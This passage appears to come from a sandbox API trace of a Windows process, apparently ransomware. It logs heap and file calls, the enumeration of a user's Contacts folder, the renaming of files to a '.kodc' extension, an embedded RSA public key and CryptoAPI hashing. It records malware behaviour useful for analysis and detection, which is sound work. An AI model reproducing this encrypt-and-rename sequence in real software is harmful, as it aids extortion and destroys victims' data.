dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f71c8 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x32b75c0 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7248 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7208 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a298 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a328 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb10 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7268 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f71e8 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.376] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x10b19, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x10b19, lpOverlapped=0x0) returned 1 [0097.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.377] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.377] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.377] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.377] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.377] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.377] CloseHandle (hObject=0x5cc) returned 1 [0097.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.398] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.kodc")) returned 1 [0097.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.399] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.401] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0097.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0097.401] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0097.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.401] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=1171) returned 1 [0097.401] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.406] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.406] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.408] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.408] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x493, lpOverlapped=0x0) returned 1 [0097.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d0958 [0097.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.408] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.409] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.409] CryptHashData (hHash=0x3331b88, pbData=0x32d0958, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.409] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32f7268 [0097.409] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x32f7268, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32f7268, pdwDataLen=0x9e2fa54) returned 1 [0097.409] GetLastError () returned 0x0 [0097.409] SetLastError (dwErrCode=0x0) [0097.409] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.410] SetLastError (dwErrCode=0x0) [0097.410] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.411] SetLastError (dwErrCode=0x0) [0097.411] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.412] GetLastError () returned 0x0 [0097.412] SetLastError (dwErrCode=0x0) [0097.413] GetLastError () returned 0x0 [0097.413] SetLastError (dwErrCode=0x0) [0097.413] GetLastError () returned 0x0 [0097.413] SetLastError (dwErrCode=0x0) [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7268 | out: hHeap=0x630000) returned 1 [0097.413] CryptDestroyHash (hHash=0x3331b88) returned 1 [0097.413] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.413] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.413] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.413] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x490) returned 0x333a888 [0097.413] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d0958 [0097.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a328 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a298 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.414] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f71e8 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a568 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec70 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x32b75c0 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7268 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7208 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f71e8 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.415] GetCurrentThreadId () returned 0x42c [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695918 [0097.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316f78 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.416] GetCurrentThreadId () returned 0x42c [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33186b8 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, 